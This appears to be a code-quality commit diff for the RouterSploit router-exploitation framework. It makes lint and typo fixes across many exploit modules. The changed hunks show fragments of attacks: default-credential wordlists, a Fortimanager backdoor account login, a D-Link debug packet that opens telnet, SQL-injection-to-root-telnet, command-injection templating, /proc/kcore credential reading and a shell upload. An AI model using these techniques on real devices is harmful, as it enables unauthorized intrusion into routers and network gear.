Unverified Commit 62b83fb4 by Marcin Bury Committed by GitHub

Improving code quality (#435)

parent 2ee21d01
......@@ -5,3 +5,10 @@ from .btle_scanner import (
BTLEScanner,
ScanDelegate
)
__all__ = [
"Device",
"BTLEScanner",
"ScanDelegate",
]
......@@ -120,7 +120,7 @@ class Device(ScanEntry):
for _, c in enumerate(service.getCharacteristics()):
if str(c.uuid) == characteristic:
char =c
char = c
break
if char:
......@@ -221,7 +221,7 @@ class Device(ScanEntry):
try:
string = color_blue(repr(data.decode("utf-8")))
except Exception:
stirng = repr(data)
string = repr(data)
except Exception:
pass
......
......@@ -13,7 +13,7 @@ class BTLEScanner(Scanner):
def _decode_address(self, resp):
addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8")
return ":".join([addr[i : i + 2] for i in range(0, 12, 2)])
return ":".join([addr[i: i + 2] for i in range(0, 12, 2)])
def _find_or_create(self, addr):
if addr in self.scanned:
......@@ -59,6 +59,7 @@ class BTLEScanner(Scanner):
if self.mac and dev.addr == self.mac:
break
class ScanDelegate(DefaultDelegate):
def __init__(self, options):
DefaultDelegate.__init__(self)
......
......@@ -24,5 +24,28 @@ from routersploit.core.exploit.printer import (
print_table,
)
import routersploit.core.exploit.utils
from routersploit.core.exploit import utils
from routersploit.core.exploit.shell import shell
__all__ = [
"Exploit",
"multi",
"mute",
"LockedIterator",
"OptIP",
"OptPort",
"OptInteger",
"OptFloat",
"OptBool",
"OptString",
"OptMAC",
"OptWordlist",
"print_info",
"print_status",
"print_success",
"print_error",
"print_table",
"utils",
"shell",
]
import os
import threading
import time
import concurrent.futures
from future.utils import with_metaclass, iteritems
from itertools import chain
from functools import wraps
from routersploit.core.exploit.printer import (
print_status,
print_error,
thread_output_stream,
)
from routersploit.core.exploit.option import Option
......@@ -66,7 +64,6 @@ class Exploit(BaseExploit):
target_protocol = "custom"
def run(self):
raise NotImplementedError("You have to define your own 'run' method.")
......@@ -204,5 +201,3 @@ class Protocol:
HTTP = "http"
HTTPS = "https"
SNMP = "snmp"
......@@ -21,7 +21,6 @@ class HTTPClient(Exploit):
verbosity = OptBool("true", "Verbosity enabled: true/false")
ssl = OptBool("false", "SSL enabled: true/false")
def http_request(self, method, path, session=requests, **kwargs):
if self.ssl:
url = "https://"
......
......@@ -156,7 +156,7 @@ class SSHClient(Exploit):
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin,termios.TCSADRAIN, oldtty)
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
return
def _windows_shell(self, chan):
......
......@@ -333,7 +333,7 @@ class RoutersploitInterpreter(BaseInterpreter):
except KeyboardInterrupt:
print_info()
print_error("Operation cancelled by user")
except:
except Exception:
print_error(traceback.format_exc(sys.exc_info()))
def command_exploit(self, *args, **kwargs):
......
import sys
import time
import binascii
import hashlib
class ApiRosClient(object):
"Routeros api"
"RouterOS API"
def __init__(self, sk):
self.sk = sk
self.currenttag = 0
......@@ -17,16 +17,21 @@ class ApiRosClient(object):
md.update(b'\x00')
md.update(pwd.encode('UTF-8'))
md.update(chal)
output = self.talk(["/login", "=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8') ])
output = self.talk([
"/login",
"=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8')
])
return output
def talk(self, words):
if self.writeSentence(words) == 0: return
if self.writeSentence(words) == 0:
return
r = []
while 1:
i = self.readSentence();
if len(i) == 0: continue
i = self.readSentence()
if len(i) == 0:
continue
reply = i[0]
attrs = {}
for w in i[1:]:
......@@ -34,9 +39,10 @@ class ApiRosClient(object):
if (j == -1):
attrs[w] = ''
else:
attrs[w[:j]] = w[j+1:]
attrs[w[: j]] = w[j + 1:]
r.append((reply, attrs))
if reply == '!done': return r
if reply == '!done':
return r
def writeSentence(self, words):
ret = 0
......@@ -50,7 +56,8 @@ class ApiRosClient(object):
r = []
while 1:
w = self.readWord()
if w == '': return r
if w == '':
return r
r.append(w)
def writeWord(self, w):
......@@ -61,31 +68,30 @@ class ApiRosClient(object):
ret = self.readStr(self.readLen())
return ret
def writeLen(self, l):
if l < 0x80:
self.writeByte((l).to_bytes(1, sys.byteorder))
elif l < 0x4000:
l |= 0x8000
tmp = (l >> 8) & 0xFF
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
elif l < 0x200000:
l |= 0xC00000
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
elif l < 0x10000000:
l |= 0xE0000000
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
def writeLen(self, length):
if length < 0x80:
self.writeByte((length).to_bytes(1, sys.byteorder))
elif length < 0x4000:
length |= 0x8000
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x200000:
length |= 0xC00000
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
elif length < 0x10000000:
length |= 0xE0000000
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
else:
self.writeByte((0xF0).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
def readLen(self):
c = ord(self.readStr(1))
......@@ -120,24 +126,27 @@ class ApiRosClient(object):
return c
def writeStr(self, str):
n = 0;
n = 0
while n < len(str):
r = self.sk.send(bytes(str[n:], 'UTF-8'))
if r == 0: raise RuntimeError("connection closed by remote end")
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def writeByte(self, str):
n = 0;
n = 0
while n < len(str):
r = self.sk.send(str[n:])
if r == 0: raise RuntimeError("connection closed by remote end")
if r == 0:
raise RuntimeError("connection closed by remote end")
n += r
def readStr(self, length):
ret = ''
while len(ret) < length:
s = self.sk.recv(length - len(ret))
if s == '': raise RuntimeError("connection closed by remote end")
if s == '':
raise RuntimeError("connection closed by remote end")
ret += s.decode('UTF-8', 'replace')
return ret
......@@ -20,7 +20,6 @@
#
##############################################################
import sys
import collections
......
......@@ -19,5 +19,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("supervisor:supervisor", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
default = OptWordlist("supervistor:supervisor", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(TelnetDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)")
......@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)")
......@@ -15,7 +15,6 @@ class Exploit(TelnetDefault):
),
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(23, "Target Telnet port")
......
import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......@@ -48,7 +47,6 @@ class Exploit(HTTPClient):
def target_function(self, data):
username, password = data.split(":")
def check(self):
response = self.http_request(
method="GET",
......@@ -57,9 +55,7 @@ class Exploit(HTTPClient):
if response is None:
return False
if all([x in response.text
for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>',
'var csrfMagicToken =']]):
if all([x in response.text for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>', 'var csrfMagicToken =']]):
return True
return False
......
......@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)")
......@@ -26,10 +26,9 @@ class Exploit(HTTPClient):
port = OptPort(8080, "Target HTTP port")
def __init__(self):
config_content = None
self.config_content = None
def run(self):
if self.check():
print_success("Target appears to be vulnerable.")
......@@ -115,4 +114,3 @@ class Exploit(HTTPClient):
ret_str += tmp_str[i + half_str_len] + tmp_str[i]
return ret_str
......@@ -42,7 +42,6 @@ class Exploit(TelnetClient):
print_success("SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell")
tn = self.telnet_login("root", "", port=20000)
if tn:
self.telnet_interactive(tn)
......
import requests
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
......
......@@ -59,7 +59,7 @@ class Exploit(HTTPClient):
for chunk in response.iter_content(chunk_size=100):
if "admin" in chunk:
print_success(chunk)
except:
except Exception:
print_error("Exploit failed - could not read /proc/kcore")
@mute
......
......@@ -150,7 +150,8 @@ class Exploit(TCPClient):
a, b = item.span()
clean_data += data[tmp_b:a]
tmp_b = b
clean_data += "................................ repeated {} times ................................".format(b-a-64)
repeated = b - a - 64
clean_data += "................................ repeated {} times ................................".format(repeated)
clean_data += data[b:]
print_info(clean_data)
......@@ -268,12 +269,12 @@ class Exploit(TCPClient):
def parse_server_hello(self, data):
version = unpack(">H", data[:2])[0]
print_status("\t\tServer Hello Version: 0x{:x}".format(version))
random = unpack(">" + "B"*32, data[2:34])
random = unpack(">" + "B" * 32, data[2:34])
random_hex = str(binascii.hexlify(bytes(random)), "utf-8")
print_status("\t\tServer Hello random data: {}".format(random_hex))
session_id_length = unpack(">B", data[34:35])[0]
print_status("\t\tServer Hello Session ID length: {}".format(session_id_length))
session_id = unpack(">" + "B"*session_id_length, data[35: 35 + session_id_length])
session_id = unpack(">" + "B" * session_id_length, data[35: 35 + session_id_length])
session_id_hex = str(binascii.hexlify(bytes(session_id)), "utf-8")
print_status("\t\tServer Hello session id: {}".format(session_id_hex))
......@@ -282,22 +283,21 @@ class Exploit(TCPClient):
print_status("\t\tCertificates length: {}".format(cert_len))
print_status("\t\tData length: {}".format(len(data)))
#contains multiple certs
# contains multiple certs
already_read = 3
cert_counter = 0
while already_read < cert_len:
cert_counter += 1
# get single certificate length
single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read:already_read+3])
single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read: already_read + 3])
print_status("\t\tCertificate {}".format(cert_counter))
print_status("\t\t\tCertificate {}: Length: {}".format(cert_counter, single_cert_len))
certificate_data = data[(already_read + 3): (already_read+3+single_cert_len)]
certificate_data = data[(already_read + 3): (already_read + 3 + single_cert_len)]
cert = x509.load_der_x509_certificate(certificate_data, default_backend())
print_status("\t\t\tCertificate {}: {}".format(cert_counter, cert))
already_read = already_read + single_cert_len + 3
def get_ssl_record(self):
hdr = self.tcp_recv(self.tcp_client, self.SSL_RECORD_HEADER_SIZE)
......
......@@ -44,8 +44,6 @@ class Exploit(HTTPClient):
def execute(self, cmd):
marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = {
......@@ -76,8 +74,6 @@ class Exploit(HTTPClient):
cmd = "echo $(({}-1))".format(number)
marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
for payload in self.payloads:
injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
......
......@@ -48,8 +48,6 @@ class Exploit(HTTPClient):
return False # target is not vulnerable
# checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = self.http_request(
method="GET",
path="/xslt",
......
......@@ -46,7 +46,7 @@ class Exploit(HTTPClient):
try:
print_status("Trying to base64 decode")
password = base64.b64decode(res[0])
except:
except Exception:
print_error("Exploit failed - could not decode password")
return
......
......@@ -178,7 +178,7 @@ class Exploit(TCPClient):
print_status("Connection OK")
print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
except:
except Exception:
print_error("Connection failed")
return
......@@ -201,7 +201,7 @@ class Exploit(TCPClient):
try:
t = telnetlib.Telnet(self.target, int(self.telnet_port))
t.interact()
except:
except Exception:
print_error("Exploit failed")
else:
print_status("Check if Telnet authentication was set back")
......
......@@ -114,15 +114,12 @@ class Exploit(HTTPClient, SSHClient):
"file": (sh_name, payload)
}
try:
self.http_request(
method="POST",
path="/DetectionPolicy/rules/rulesimport.cgi",
files=multipart_form_data,
session=self.session
)
except:
pass
return
......
......@@ -75,7 +75,7 @@ class Exploit(HTTPClient):
if len(res):
try:
b64decode(res[0]) # checking if data is base64 encoded
except:
except Exception:
return False # target is not vulnerable
else:
return False # target is not vulnerable
......
......@@ -67,7 +67,7 @@ class Exploit(UDPClient):
sock.send(buf)
response = sock.recv(65535)
sock.close()
except:
except Exception:
return False # target is not vulnerable
if "Linux, UPnP/1.0, DIR-" in response:
......
from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient
class Exploit(UDPClient):
__info__ = {
"name": "D-Link DIR-815 & DIR-850L RCE",
......
......@@ -25,7 +25,6 @@ class Exploit(HTTPClient):
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
self.credentials = []
......
......@@ -3,7 +3,6 @@ from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link DWL-3200AP Password Disclosure",
......
......@@ -35,7 +35,7 @@ class Exploit(TCPClient, TelnetClient):
try:
sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024)
except:
except Exception:
pass
sock.close()
......@@ -47,7 +47,7 @@ class Exploit(TCPClient, TelnetClient):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.interact()
except:
except Exception:
print_error("Exploit failed - could not connect to the telnet service")
else:
print_error("Exploit failed - target seems to be not vulnerable")
......@@ -64,7 +64,7 @@ class Exploit(TCPClient, TelnetClient):
if "Hello" in response:
sock.sendto(b"BYEDBG", (self.target, 39889))
return True # target is vulnerable
except:
except Exception:
pass
return False # target is not vulnerable
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "D-Link Multi HNAP RCE",
......
......@@ -36,7 +36,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
except Exception:
print_error("Exploit Failed - SSH Service is down")
return
......@@ -45,7 +45,7 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
except Exception:
print_status("Error with Existing Session. Wait few minutes.")
return
......@@ -54,7 +54,7 @@ class Exploit(SSHClient):
print_success("Exploit succeeded")
ssh_interactive(client)
except:
except Exception:
print_error("Exploit failed")
return
......@@ -67,7 +67,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
except:
except Exception:
return False # target is not vulnerable
trans = client.get_transport()
......@@ -75,12 +75,12 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
except Exception:
return None # could not verify
try:
trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
except:
except Exception:
return False # target is not vulnerable
return True # target is vulnerable
......
......@@ -72,7 +72,7 @@ class Exploit(UDPClient):
try:
print_status("Waiting for response")
response = sock.recv(1024)
except:
except Exception:
print_error("Exploit failed - device seems to be not vulnerable")
return
......@@ -88,7 +88,7 @@ class Exploit(UDPClient):
try:
response = sock.recv(1024)
except:
except Exception:
return False # target is not vulnerable
if len(response):
......
......@@ -54,7 +54,7 @@ class Exploit(HTTPClient):
"ACTION2": "snort"
}
response = self.http_request(
self.http_request(
method="POST",
path="/cgi-bin/ids.cgi",
headers=headers,
......@@ -81,7 +81,7 @@ class Exploit(HTTPClient):
version = res[0][0]
update = int(res[0][1])
if Version(version) <= Version("2.19") and udpate <= 110:
if Version(version) <= Version("2.19") and update <= 110:
return True # target is vulnerable
return False # target is not vulnerable
......@@ -142,9 +142,9 @@ class Exploit(HTTPClient):
if response is not None and response.status_code <= 302:
print_success(
"Seems good but check "
+ "{}:{}".format(self.target, self.port)
+ " using your browser to verify if authentication is disabled or not."
"Seems good but check " +
"{}:{} ".format(self.target, self.port) +
"using your browser to verify if authentication is disabled or not."
)
return True
else:
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment